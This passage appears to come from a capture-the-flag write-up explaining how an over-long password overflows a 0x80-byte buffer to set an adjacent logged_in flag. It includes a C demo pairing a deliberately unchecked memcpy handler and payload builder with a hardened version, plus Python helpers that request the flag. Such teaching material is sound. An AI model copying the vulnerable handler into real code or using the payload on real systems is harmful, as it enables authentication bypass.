N0541: Tokyohot

Thus, an overflow of buf can overflow the buffer that user->pwd points to! By providing an over-long password we can write past the 0x80 bytes allocated for pwd and reach the logged_in variable located at 0x603200 (example address). Everything we send beyond byte 0x80 of the password lands on logged_in, so the password write itself sets the flag the login check looks at.

/* globals as laid out in the binary: the users array, then the login flag */
user_t users[10];
int logged_in = 0;
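The following is an added example (not the challenge binary's code and not the writeup's exploit) that models the overflow the text describes and puts the fix beside it. It assumes a struct in which a 0x80-byte pwd buffer is immediately followed by logged_in; the struct guarantees the adjacency that the real binary only gets from its global layout (users[10] followed by logged_in), and the addresses, function names and the hunter2 sample password are made up for the demo.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define PWD_LEN 0x80   /* the 0x80-byte password buffer from the writeup */

#if defined(__GNUC__)
#define NOINLINE __attribute__((noinline))
#else
#define NOINLINE
#endif

/* Assumed layout: password buffer directly followed by the login flag.
 * volatile forces the flag to be re-read from memory after the copy. */
typedef struct {
    char pwd[PWD_LEN];
    volatile int logged_in;
} user_t;

/* Vulnerable handler: copies as many bytes as the client sent, no bounds
 * check. Returns the value of logged_in afterwards. Kept out of line so the
 * compiler treats u as an unknown object, as in a real binary. */
static NOINLINE int vuln_set_password(user_t *u, const char *input, size_t len) {
    u->logged_in = 0;
    memcpy(u->pwd, input, len);        /* len > 0x80 spills into logged_in */
    return u->logged_in;
}

/* Hardened handler: reject input that does not fit (leaving room for the
 * terminator). Returns -1 on rejection, otherwise the unchanged flag. */
static NOINLINE int safe_set_password(user_t *u, const char *input, size_t len) {
    u->logged_in = 0;
    if (len >= PWD_LEN)
        return -1;
    memcpy(u->pwd, input, len);
    u->pwd[len] = '\0';
    return u->logged_in;
}

/* Build the payload the text describes: 0x80 bytes of filler, then the
 * 4-byte integer we want logged_in to become (pwntools style: b'A' * 0x80
 * + p32(1)). Host byte order keeps the demo portable; on x86-64 that is the
 * little-endian bytes 01 00 00 00. Returns the payload length, 0 if the
 * output buffer is too small. */
static size_t build_payload(unsigned char *out, size_t cap, int new_flag) {
    if (cap < PWD_LEN + sizeof new_flag)
        return 0;
    memset(out, 'A', PWD_LEN);
    memcpy(out + PWD_LEN, &new_flag, sizeof new_flag);
    return PWD_LEN + sizeof new_flag;
}

/* Over-long password against the vulnerable handler; returns the resulting
 * logged_in value (1 means the login check has been bypassed). */
static int demo_vulnerable(void) {
    user_t u;
    unsigned char payload[PWD_LEN + sizeof(int)];
    size_t n = build_payload(payload, sizeof payload, 1);
    return vuln_set_password(&u, (const char *)payload, n);
}

/* Same payload against the hardened handler; returns -1 (rejected). */
static int demo_hardened(void) {
    user_t u;
    unsigned char payload[PWD_LEN + sizeof(int)];
    size_t n = build_payload(payload, sizeof payload, 1);
    return safe_set_password(&u, (const char *)payload, n);
}

/* A normal-length password must leave the flag at 0 in both handlers;
 * returns 1 if so. */
static int demo_benign(void) {
    user_t u;
    const char *pw = "hunter2";   /* constructed sample password */
    int a = vuln_set_password(&u, pw, strlen(pw));
    int b = safe_set_password(&u, pw, strlen(pw));
    return a == 0 && b == 0;
}

int main(void) {
    printf("vulnerable handler, over-long password: logged_in = %d\n", demo_vulnerable());
    printf("hardened handler, over-long password: rc = %d\n", demo_hardened());
    printf("benign password leaves the flag at 0: %d\n", demo_benign());
    return 0;
}
```

The only difference between the two handlers is the length check; the payload is the same bytes the Python exploit sends as the password, which is why a write that never touches the stack (no canary, no return address) is still enough to flip the login state.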

# recvuntil(s, delim) is the writeup's socket helper: read from s until delim is seen

def menu(s):
    # consume the menu prompt before sending a choice
    recvuntil(s, b'> ')

def get_flag(s):
    menu(s)
    s.sendall(b'3\n')              # menu option 3 prints the flag once logged in
    flag = recvuntil(s, b'\n')
    print(flag.decode())